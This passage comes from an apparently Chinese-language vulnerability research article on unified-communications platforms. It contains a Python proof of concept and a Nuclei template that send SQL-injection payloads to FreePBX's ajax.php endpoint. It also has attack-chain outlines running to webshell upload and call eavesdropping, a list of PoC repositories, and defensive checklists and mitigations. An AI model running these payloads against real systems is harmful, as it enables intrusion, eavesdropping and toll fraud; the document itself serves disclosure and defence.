        "module=FreePBX%5Cmodules%5Cendpoint%5Cajax"
        "&command=model"
        "&template=x"
        "&model=model"
        "&brand=x'+AND+EXTRACTVALUE(1,CONCAT('~VER:',"
        "(SELECT+VERSION()),'~'))+--+"
    )
    
    try:
        ver_resp = requests.get(
            f"{base_url}/admin/ajax.php?{version_payload}",
            headers=headers,
            verify=False,
            timeout=15
        )
        
        ver_match = re.search(r'~VER:([^~]+)~', ver_resp.text)
        if ver_match:
            db_version = ver_match.group(1)
            print(f"[+] 数据库版本: {db_version}")
    except requests.exceptions.RequestException:
        pass
    
    print("\n[!] CVE-2025-57819 漏洞已确认")
    print("[!] 后续步骤: 通过 SQL 注入创建管理员账户或写入 Webshell")
    print("[!] 注意: 此 PoC 仅用于授权安全测试")
    
    return True

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <host> [port] [--http]")
        sys.exit(1)
    
    host = sys.argv[1]
    port = int(sys.argv[2]) if len(sys.argv) > 2 and sys.argv[2].isdigit() else 443
    use_ssl = "--http" not in sys.argv
    
    exploit_cve_2025_57819(host, port, use_ssl)

Nuclei YAML 检测模板

id: cve-2025-57819-freepbx-auth-bypass-sqli-rce

info:
  name: FreePBX Authentication Bypass Leading to SQLi and RCE
  author: security-researcher
  severity: critical
  description: |
    FreePBX versions 15, 16, and 17 contain a vulnerability in the
    Endpoint Manager module that enables unauthenticated attackers to
    bypass administrator login controls and perform SQL injection
    leading to remote code execution.
  reference:
    - https://github.com/FreePBX/security-reporting/security/advisories/GHSA-m42g-xg4c-5f3h
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cwe-id: CWE-89
  tags: freepbx,sqli,rce,cve2025,cve,auth-bypass,voip,pbx

http:
  - raw:
      - |
        GET /admin/ HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "FreePBX"
          - "Sangoma"
        condition: or

      - type: status
        status:
          - 200
          - 302

  - raw:
      - |
        GET /admin/ajax.php?module=FreePBX%5Cmodules%5Cendpoint%5Cajax&command=model&template=x&model=model&brand=x'+AND+EXTRACTVALUE(1,CONCAT('~USER:',(SELECT+USER()),'~'))+--+ HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "~USER:[a-zA-Z0-9_]+@[a-zA-Z0-9._]+~"

      - type: status
        status:
          - 200
          - 500

0x05.3 CVE-2025-66039 — FreePBX AUTHTYPE 绕过

CVE-2025-66039(CVSS 9.3)是 FreePBX 的另一个认证绕过漏洞,当系统的 Authorization Type 被设置为 “webserver” 时,攻击者可以通过伪造 Authorization Header 绕过认证,登录管理控制面板。虽然此配置不是默认设置,但在某些高级配置场景中被启用。攻击者可结合 CVE-2025-61675(SQL 注入)和 CVE-2025-61678(任意文件上传)实现完整的系统接管。

0x05.4 CVE-2024-42365 — Asterisk AMI 认证 RCE

CVE-2024-42365 是 Asterisk Manager Interface(AMI)中的一个认证后远程代码执行漏洞。拥有 write=originate 权限的 AMI 用户可以通过 Originate 命令修改 /etc/asterisk/ 目录下的所有配置文件,实现任意命令执行。Metasploit 已集成该漏洞的利用模块 exploit/linux/misc/asterisk_ami_originate_auth_rce,利用 AMI 协议的 Originate Action 在目标系统上执行系统命令。


0x06 公开 PoC 收集情况与利用思路

PoC 收集情况总表

CVE 编号PoC 类型可用性来源
CVE-2026-22844HTTP PoC / Nuclei 模板概念验证本文构造
CVE-2025-49457DLL 植入 PoC概念验证本文构造
CVE-2025-20236恶意链接 PoC概念验证本文构造
CVE-2025-52913路径穿越 PoC已公开ZeroPath 分析
CVE-2025-67822认证绕过 PoC研究级Mitel 安全公告
CVE-2025-47188完整利用链已公开InfoGuard Labs
CVE-2020-7029CSRF PoC已公开Avaya 安全公告
CVE-2025-32106POST RCE PoC已公开NVD 参考链接
CVE-2025-57819SQLi → RCE PoC已公开在野利用GitHub PoC 仓库
CVE-2025-66039AUTHTYPE 绕过 PoC已公开Horizon3.ai
CVE-2024-42365Metasploit Module已公开rapid7/metasploit

关键 PoC 仓库链接

资源链接说明
FreePBX CVE-2025-57819 PoCgithub.com/MuhammadWaseem29/SQL-Injection-and-RCE_CVE-2025-57819完整 SQLi → RCE PoC
FreePBX 安全公告github.com/FreePBX/security-reporting/security/advisories/GHSA-m42g-xg4c-5f3h官方安全公告
Asterisk AMI RCE (Metasploit)github.com/rapid7/metasploit-framework/pull/19613Metasploit 模块
Mitel SIP Phone 分析labs.infoguard.ch/advisories/cve-2025-47188_mitel_phone_unauthenticated_rce/固件逆向与利用
Horizon3 FreePBX 研究horizon3.ai/attack-research/the-freepbx-rabbit-hole-cve-2025-66039-and-others/深度漏洞研究
Audiocodes 技术报告github.com/austin2111/papers电信硬件漏洞分析

防守型验证思路

  1. 资产发现优先:使用 nmap -sV -p 80,443,5060,5061,8088,49249 <target_range> 扫描内网 UC 设备;识别 SIP 服务指纹(SIP/2.0 200 OK 响应头);检查 Web 管理面板(/admin//cgi-bin//webpages/)。

  2. 版本指纹识别:通过 HTTP 响应头和页面内容判断具体产品和版本;FreePBX 在 /admin/ 页面显示版本信息;Audiocodes 在 /cgi-bin/main 返回设备型号;Mitel 设备在 Web 界面显示固件版本。

  3. 漏洞验证策略:对确认版本的目标使用对应的 Nuclei 模板进行无害化检测;优先使用只读验证(如 SQL 注入的 SELECT VERSION())确认漏洞存在,避免执行破坏性操作。


0x07 攻击链分析:从 SIP 协议到全域接管

SIP 协议攻击面概述

SIP(Session Initiation Protocol)是 UC 平台的核心信令协议,工作在 UDP/TCP 5060/5061 端口。SIP 协议本身的攻击面包括:认证机制薄弱(默认使用 Digest 认证,密码常为弱口令);明文传输信令(非 TLS 配置下);解析器漏洞(缓冲区溢出、格式字符串);以及注册劫持(通过重 REGISTER 请求)。

攻击链 1:FreePBX 认证绕过 → 命令注入 → 内网横向

CVE-2025-57819 (FreePBX 认证绕过)
    ↓ 未认证访问 /admin/ajax.php 端点
SQL 注入获取数据库凭据
    ↓ EXTRACTVALUE 报错注入
创建恶意管理员账户
    ↓ INSERT INTO ampusers
通过管理面板上传 PHP Webshell
    ↓ /var/www/html/shell.php
获取系统 Shell (asterisk 用户)
    ↓ sudo 权限或 SUID 提权
内网横向移动
    ↓ 利用 SIP trunk 凭据访问其他 PBX
全域电话系统控制
    ↓ 劫持呼叫路由 + 通话窃听

攻击链 2:Mitel SIP 电话 → 会议室窃听 → 企业情报窃取

CVE-2025-47188 (Mitel 电话命令注入)
    ↓ 通过端口 49249 BusyBox httpd
获取电话 root Shell
    ↓ 默认凭据 backdoor/backdoor
配置电话为被动监听模式
    ↓ 修改 SIP 配置重定向 RTP 流
窃听会议室通话
    ↓ 录制音频传输至外部服务器
获取敏感商业信息
    ↓ 利用通话内容进行社会工程
高级持续性威胁 (APT)

攻击链 3:Audiocodes SBC → VoIP 网络渗透 → PSTN 欺诈

CVE-2025-32106 (Audiocodes MP-11x RCE)
    ↓ POST 请求命令注入
获取 SBC 设备控制权
    ↓ 篡改 SIP 信令路由
劫持出站呼叫
    ↓ 将呼叫路由至国际付费号码
PSTN 通话欺诈
    ↓ 大规模高费率呼叫
经济损失 + 合规风险
    ↓ 利用设备作为内网跳板
渗透企业 VoIP 网络

攻击链 4:Zoom MMR → 会议窃密 → 企业情报战

CVE-2026-22844 (Zoom MMR 命令注入)
    ↓ 会议参与者发送恶意输入
MMR 命令执行
    ↓ 获取媒体路由器控制权
窃听所有会议音视频流
    ↓ 解密和录制会议内容
获取企业战略决策信息
    ↓ 利用信息进行内部交易或竞争情报
持久化后门
    ↓ 在 MMR 上安装隐蔽监控
长期情报收集

代表 CVE 案例与威胁组织

威胁组织类型利用的 UC 漏洞技术特征
AquaBot 僵尸网络IoT/VoIP 僵尸网络Mitel 多个 CVE扫描暴露的 VoIP 设备,利用认证缺陷植入 DDoS 僵尸
BlackCat/ALPHV勒索组织Mitel MiCollab以 UC 平台为初始访问向量,横向至域控制器
自由 PBX 猎手自动化扫描器CVE-2025-57819大规模扫描互联网暴露的 FreePBX,植入加密货币挖矿程序
通话欺诈集团罪犯组织多种 VoIP 漏洞劫持企业电话系统拨打高费率国际号码

0x08 共性攻击模式分析

模式 1:未认证输入验证缺失

代表漏洞:CVE-2025-57819(FreePBX)、CVE-2025-32106(Audiocodes)、CVE-2025-52913(Mitel)

模式特征:UC 平台的 Web 管理组件在处理用户输入时缺乏基本的验证和过滤。与传统 Web 应用不同,UC 管理界面往往被视为"内网工具"而忽视安全编码实践。SQL 注入、路径穿越和命令注入等经典 Web 漏洞在 UC 平台中反复出现,根本原因是开发团队缺乏 Web 安全开发经验。

防御建议:实施输入验证白名单机制;使用参数化查询替代字符串拼接;对所有管理接口实施强制认证和网络隔离。

模式 2:认证绕过与会话管理缺陷

代表漏洞:CVE-2025-67822(Mitel MX-ONE)、CVE-2025-66039(FreePBX AUTHTYPE)

模式特征:UC 平台的认证机制存在设计缺陷,包括访问控制列表配置不当、备用认证路径绕过、以及遗留代码中的弱认证实现。这些漏洞通常出现在 Provisioning Manager、设备管理等辅助组件中,这些组件的安全关注度低于核心会议服务。

模式 3:DLL/共享库搜索路径劫持

代表漏洞:CVE-2025-49457(Zoom Windows Client)

模式特征:UC 客户端软件在 Windows 平台上使用不安全的 DLL 加载策略,为攻击者提供了本地提权的途径。这一模式在企业协作软件中反复出现(Microsoft Teams、Slack 等也有类似历史漏洞),根本原因是对 Windows DLL 搜索顺序安全性的忽视。

模式 4:SIP 协议栈与固件安全缺陷

代表漏洞:CVE-2025-47188(Mitel SIP Phone)、CVE-2025-32106(Audiocodes MP)

模式特征:VoIP 终端设备(IP 电话、媒体网关、SBC)的固件安全质量普遍低于 IT 服务器软件。这些设备通常运行精简的 Linux 系统,缺少现代安全防护机制(如 SELinux、ASLR),且默认配置常包含调试端口和后门凭据。固件更新频率低,补丁管理困难。

模式 5:补丁不完全与漏洞变体

代表漏洞:CVE-2025-52913(Mitel MiCollab,CVE-2024-41713 的绕过)

模式特征:UC 平台的安全补丁往往仅在表面层面修复特定的漏洞模式(如过滤 ../ 字符串),而未从根本上解决底层的设计缺陷(如使用安全的路径规范化 API)。攻击者通过变体编码、双重编码或替代路径遍历技术即可绕过补丁,这要求安全团队持续关注补丁质量和漏洞变体。


0x09 应急排查与防守建议

紧急排查清单

  • Zoom Node MMR: 检查所有 Zoom Node Meetings Hybrid 和 Meeting Connector 部署的 MMR 模块版本,确认 ≥ 5.2.1716.0
  • Zoom Client: 扫描域内所有 Windows 终端的 Zoom 客户端版本,确认 Workplace/Rooms/SDK ≥ 6.3.10
  • Cisco Webex App: 检查企业内所有 Webex App 安装版本,确认 44.6 版本 ≥ 44.6.2.30589,排除 44.7 未升级版本
  • Mitel MiCollab: 检查 MiCollab 服务器版本,确认 ≥ 9.8 SP3 (9.8.3.1),特别关注 NPM 组件
  • Mitel MiVoice MX-ONE: 检查 Provisioning Manager 版本,确认已安装 MXO-15711 补丁
  • Mitel SIP 电话: 扫描内网所有 6800/6900 系列电话的固件版本,确认 > R6.4.0.SP4;检查端口 49249 是否开放
  • Avaya Aura CM: 检查 Communication Manager 版本,确认 ≥ 7.1.3.5 或 ≥ 8.1.0.0
  • Audiocodes MP-11x: 检查所有 Mediapack 设备固件版本,确认 > 6.60A.369.002
  • FreePBX: 检查 Endpoint Manager 模块版本(15 ≥ 15.0.66, 16 ≥ 16.0.89, 17 ≥ 17.0.3);检查 /etc/freepbx.conf 是否存在;检查 /var/www/html/.clean.sh 是否存在
  • Asterisk: 检查 Asterisk 版本(18 ≥ 18.24.2, 20 ≥ 20.9.2, 21 ≥ 21.4.2);审查 AMI 配置中的 write=originate 权限

日志关键字段表

产品日志位置关键字段异常指标
Zoom MMRMMR 服务日志命令执行模式、异常进程非预期 shell 调用、异常 outbound 连接
Cisco Webex客户端日志 + EDRDLL 加载事件、网络连接从非标准路径加载 DLL、异常 URL 下载
Mitel MiCollabWeb 访问日志URL 路径中的 ../%2e%2e%2f未认证的管理端点访问、路径遍历序列
Mitel SIP Phone系统日志端口 49249 访问、Telnet 连接BusyBox httpd 异常请求、非默认 Telnet
Avaya Aura CMWeb 管理日志CSRF 请求来源、异常管理操作非管理终端发起的配置修改
AudiocodesWeb 访问日志POST 请求内容、异常参数包含 shell 命令字符的 POST 数据
FreePBXApache 访问日志 + Asterisk CDRmodular.php POST 请求、异常 extension9998 extension 通话、ampusers 表变更
AsteriskAMI 日志Originate Action、配置文件变更异常的配置文件写入、非授权 Originate 命令

紧急缓解措施

  1. 网络隔离:将所有 UC 管理接口限制在管理 VLAN 中,通过防火墙 ACL 限制源 IP;SIP 服务(5060/5061)仅允许已知的 SIP trunk 和终端 IP 访问
  2. Web 管理加固:禁用不必要的管理端口(如 Mitel 电话的 49249 端口);对 FreePBX、Asterisk AMI 实施 IP 白名单;将 FreePBX AUTHTYPE 设置为 “usermanager”
  3. 凭据轮换:修改所有 UC 系统的默认密码和管理凭据;轮换 SIP trunk 密码和 extension 密码;删除不必要的后门账户
  4. 监控增强:在 SIEM 中建立 UC 平台的异常检测规则;监控 SIP 协议的异常流量模式;关注通话记录(CDR)中的异常国际呼叫

长期安全加固建议

  1. 补丁管理流程:建立 UC 平台的定期补丁评估和部署流程,确保安全补丁在 72 小时内部署至关键系统
  2. 最小权限原则:AMI 账户仅授予必要的权限(避免 write=originate 的过度授权);管理员账户使用 MFA
  3. 网络分段:将语音网络(VLAN)与数据网络严格隔离;UC 管理平面与数据平面分离
  4. 固件生命周期管理:建立 VoIP 终端设备的固件更新计划;淘汰已停止安全支持的设备
  5. 安全评估周期:每季度对 UC 平台进行漏洞扫描和渗透测试;将 UC 系统纳入红队演练范围

0x0A 参考资料

  1. Zoom Security Bulletin ZSB-26001 — CVE-2026-22844 Node MMR 命令注入:https://www.zoom.com/en/trust/security-bulletin/zsb-26001/
  2. Zoom Security Bulletin ZSB-25030 — CVE-2025-49457 Windows 客户端提权:https://www.zoom.com/en/trust/security-bulletin/zsb-25030/
  3. Cisco Security Advisory cisco-sa-webex-app-client-rce-ufyMMYLC — CVE-2025-20236:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-webex-app-client-rce-ufyMMYLC
  4. Mitel Security Advisory MISA-2025-0007 — CVE-2025-52913 MiCollab 路径穿越:https://www.mitel.com/support/security-advisories/mitel-product-security-advisory-misa-2025-0007
  5. Mitel Security Advisory MISA-2025-0009 — CVE-2025-67822 MiVoice MX-ONE 认证绕过:https://www.mitel.com/support/security-advisories/mitel-product-security-advisory-misa-2025-0009
  6. Mitel Security Advisory MISA-2025-0004 — CVE-2025-47188/47187 SIP 电话漏洞:https://www.mitel.com/support/mitel-product-security-advisory-misa-2025-0004
  7. InfoGuard Labs — CVE-2025-47188 Mitel Phone 未授权 RCE 技术分析:https://labs.infoguard.ch/advisories/cve-2025-47188_mitel_phone_unauthenticated_rce/
  8. FreePBX Security Advisory — CVE-2025-57819 认证绕过:https://github.com/FreePBX/security-reporting/security/advisories/GHSA-m42g-xg4c-5f3h
  9. Horizon3.ai — FreePBX CVE-2025-66039 深度分析:https://horizon3.ai/attack-research/the-freepbx-rabbit-hole-cve-2025-66039-and-others/
  10. NVD — CVE-2025-32106 Audiocodes Mediapack RCE:https://nvd.nist.gov/vuln/detail/CVE-2025-32106
  11. NVD — CVE-2020-7029 Avaya Aura Communication Manager CSRF:https://nvd.nist.gov/vuln/detail/CVE-2020-7029
  12. Avaya Security Advisory — ASA-2020-106:https://support.avaya.com/css/public/documents/101070201
  13. IONIX — CVE-2025-57819 FreePBX 在野利用分析:https://www.ionix.io/blog/cve-2025-57819-freepbx-authentication-bypass
  14. Metasploit — Asterisk AMI Auth RCE Module (PR #19613):https://github.com/rapid7/metasploit-framework/pull/19613